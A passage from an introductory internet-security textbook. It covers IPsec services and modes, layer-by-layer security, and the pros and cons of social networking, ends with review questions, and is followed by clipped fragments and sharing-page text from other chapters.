5.5 IP SECURITY
Definition
Internet Protocol Security (IPsec) is a protocol suite for securing
Internet Protocol (IP) communications by authenticating and
encrypting each IP packet of a communication session.
What is IP Security?
The Internet Protocol is responsible for addressing hosts and for
routing datagrams (packets) from a source host to a destination host
across one or more IP networks. For this purpose, the Internet Protocol
defines the format of packets and provides an addressing system that
has two functions: identifying hosts and providing a logical location
service.
Datagram Construction
Each datagram has two components: a header and a payload. The
IP header is tagged with the source IP address, the destination IP
address, and other meta-data needed to route and deliver the datagram.
The payload is the data that is transported. This method of nesting the
data payload in a packet with a header is called encapsulation.
110
Fig 5.3 Datagram Construction

5.6 IP addressing and routing
IP addressing entails the assignment of IP addresses and
associated parameters to host interfaces. The address space is divided
into networks and sub networks, involving the designation of network
or routing prefixes. IP routing is performed by all hosts, but most
importantly by routers, which transport packets across network
boundaries. Routers communicate with one another via specially
designed routing protocols, either interior gateway protocols or
exterior gateway protocols, as needed for the topology of the network.
IP routing is also common in local networks. For example, many
Ethernet switches support IP multicast operations.[1] These switches
use IP addresses and Internet Group Management Protocol to control
multicast routing but use MAC addresses for the actual routing.
Fig 5.4 IP Addressing
111
a. Security at Application Layer
Ÿ Implemented in end-hosts
Ÿ Advantages
Ÿ Extend application without involving operating system.
Ÿ Application can understand the data and can provide the

appropriate security.
Ÿ Disadvantages
Ÿ Security mechanisms have to be designed independently of

each application.
b. Security at Transport Layer
Ÿ Implemented in end-hosts
Ÿ Advantages
Ÿ Existing applications get security seamlessly
Ÿ Disadvantages
Ÿ Protocol specific
c. Security at Network Layer

Ÿ IP Security (IPSec)
Ÿ Advantages
Ÿ Provides seamless security to application and transport layers

(ULPs).
Ÿ Allows per flow or per connection security and thus allows for
very fine-grained security control.
Ÿ Disadvantages
Ÿ More difficult to exercise on a per user basis on a multi-user

machine.
112
d. Security at Data Link Layer
Ÿ (Hardware encryption)
Ÿ Need a dedicated link between host/routers.
Ÿ Advantages
Ÿ Speed.
Ÿ Disadvantages
Ÿ Not scalable.
Ÿ Need dedicated links
5.6.1 IPSec Security Services

Ÿ Connectionless integrity
Ÿ Assurance that received traffic has not been modified. Integrity

includes anti-reply defenses.
Ÿ Data origin authentication
Ÿ Assurance that traffic is sent by legitimate party or parties.
Ÿ Confidentiality (encryption)
Ÿ Assurance that user's traffic is not examined by non-

authorized parties.
Ÿ Access control
Ÿ Prevention of unauthorized use of a resource.

5.6.2 IPSec Modes of Operation
Transport Mode: protect the upper layer protocols
Fig 5.5 Modes of Operation
113
5.6.3 Advantages of IP Security
Ÿ Host Software is much simpler at the network layer
Ÿ Transport layer already provide connection oriented, Should not

repeat the work
Ÿ Many application do not require sequential delivery of packets
Ÿ It is better to provide degraded service to everyone than to limit

network access
Ÿ Server or router could be overloaded managing too many
connections.
5.7 SOCIAL MEDIA
5.7.1 Definition of Social Networking
The use of internet-based social media programs to make
connections with friends, family, classmates, customers and clients.
Social networking can be done for social purposes, business purposes or
both. The programs show the associations between individuals and
facilitate the acquisition of new contacts. Examples of social networking
have included Face book, LinkedIn, Classmates.com and Yelp.
5.7.2 What is Social Networking?
Social networking is the grouping of individuals into specific
groups, like small rural communities or a neighborhood subdivision, if
you will. Although social networking is possible in person, especially
in the workplace, universities, and high schools, it is most popular
online.
Social networking programs group individuals by interests,
hometowns, employers, schools and other commonalities. Social
networking is also a significant target area for marketers seeking to
engage users.
When it comes to online social networking, websites are
commonly used. These websites are known as social sites. Social
114
networking websites function like an online community of internet
users. Depending on the website in question, many of these online
community members share common interests in hobbies, religion,
politics and alternative lifestyles. Once you are granted access to a social
networking website you can begin to socialize. This socialization may
include reading the profile pages of other members and possibly even
contacting them.
5.7.3 Top 15 most Popular Social Networking Sites
1. FACEBOOK 2.TWITTER 3. LinkedIn
4. PINTEREST 5. GOOGLE 6.TUMBLR.
7. INSTAGRAM 8. VK 9.FLICKR
10.MYSPACE 11.TAGGED 12. ASK.FM
13.MEET UP 14.MEET ME 15.CLASSMATES
ADVANTAGES:
Here is a list of advantages of using the social networking websites:
1. The main advantage of social networking site is that it helps in
establishing connection with people, friends and relatives. It helps in
sharing one's view, share pictures and lots of other stuffs.
115
2. It helps students in interacting with one another and share ideas.
This helps in improving student's creativity.
3. The social networking websites can be accessed from any part of
the globe. This helps the students to establish communication with their
teachers and friends through which they can improve their knowledge.
4. Social networking sites are not only used by the students for
sharing pictures, videos or it is not only meant for fun and
entertainment. Through social networking sites like face book,
LinkedIn one can become a member and can also post relevant
information about campus drive.
5. Through these sites the students can establish contact with
entrepreneurs, corporate people and can gain valuable information
from them.
6. Social networking sites have taken a new dimension called
marketing. Certain websites offer advertisements to its subscribers.
DISADVANTAGES:
Every coin has two sides. Whenever there comes the point of
advantages, disadvantages also comes into picture obviously. So some
of the disadvantages are:
1. One of the major disadvantages of using social networking
websites is that students can get addicted to it. They spend many hours
in these social networking sites which can obviously degrade their
academic performance.
2. Students may use these social networking sites until mid night or
even more which can lead to health related problems.
3. Some students may spend a lot of time in Face book by which they
lack to spend time with their family members. This can also be a
disadvantage.
4. They may also tend to provide detailed information like phone
numbers, address which is very dangerous because they can easily be
tracked down by strangers.
116
5.8 QUESTIONS
Give Short Answers
1. Name the laws that are included under Cyber law.
2. What is cyber crime?
3. What is the purpose of electronic signatures?
4. Name the laws of intellectual property.
5. In which application the data protection and privacy are needed?
6. Name any two advantages of cyber law.
7. Define DNS.
8. Define IP.
9. What is the purpose of issuing digital signature certificate?
10. What is intellectual property?
1. Illustrate the need of cyber law with an example.
2. Enumerate the advantages of cyber law.
3. Elucidate the IP architecture.
4. Give a brief note on cyber laws used in social media.
117
Notes
Notes

Internet Security E-Book

Uploaded by

Copyright:

Available Formats

Internet Security E-Book

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Internet Security E-Book

Uploaded by

Copyright:

Available Formats

INFORMATION

S. C. Punitha, M.Sc., M.Phil., MFT.,

PSGR KRISHNAMMAL COLLEGE FOR WOMEN

No part of this book shall be reproduced in any form without the

FIRST EDITION : 2014

Price : Rs. 100

s User identification and authorization to the system were non-

Ÿ A successful organization should have multiple layers of security in

Fig 1.1 Block Diagram of Information Security

SDLC Water Methodology

Fig 1.2. SDLC Waterfall Method

Ÿ Administrative or root accounts should have even stronger

Ÿ Assign a unique administrative account and password to each

Ÿ For Windows operating systems, avoid adding service accounts

Ÿ After installation, all computers should be routinely maintained

Ÿ Test the restore capability periodically.

Ÿ Spyware and adware

Ÿ Zero-day attacks, also called zero-hour attacks

Ÿ Denial of service attacks

Ÿ Data interception and theft

Network Security Components:

Ÿ Firewall, to block unauthorized access to your network

Ÿ Intrusion prevention systems (IPS), to identify fast-spreading

Ÿ Cipher text - the transformed message

Ÿ Cipher - an algorithm for transforming an intelligible message

Algorithm Name Key Management Issue

Triple-DES Ÿ The single key option which is

Key Establishment Algorithms

Ÿ The modulus shall be at least 1024

KeccakTools is a set of C++ classes aimed at helping analyze the

Ÿ Something the person is (like a human with a fingerprint).

Fig 2.1 Example of 10 Different People Iris

Fig 2.2 Voice Recognition

Ÿ Ink-less Methods - sense the ridges on a finger

"Live scan" fingerprint scanners

Scan left Thin Image Sample Access Access to

Fig 2.3 Fingerprint Recognition Process

Single party methods

Fig 2.4 Password Authentication

A log in window for a website requesting a username and a password.

Despite the name, there is no need for passwords to be actual

Most organizations specify a password policy that sets

The simplest password attack is a brute force attack where an

A dictionary attack compiles a massive list of common words and

A rainbow table uses a huge list of precomputed hash values of

2.10.4 Password Verification

There are several fundamental differences between traditional

The verification methods are 3 types.

Ÿ Application specific passwords

Fig 2.5 Password Authentication

A text message with your code has been sent to:

*** *** **20

Don’t ask for codes again to this

Fig 2.6 Code Verification

Fig 2.7 Password Specification

Ÿ Sixteen letters (Example: hog ugly kid zebu)

Ÿ A wasted trip to the Doctor

Ÿ A computer program that is designed to replicate itself by copying

Ÿ 2 main characteristics of viruses

* * **20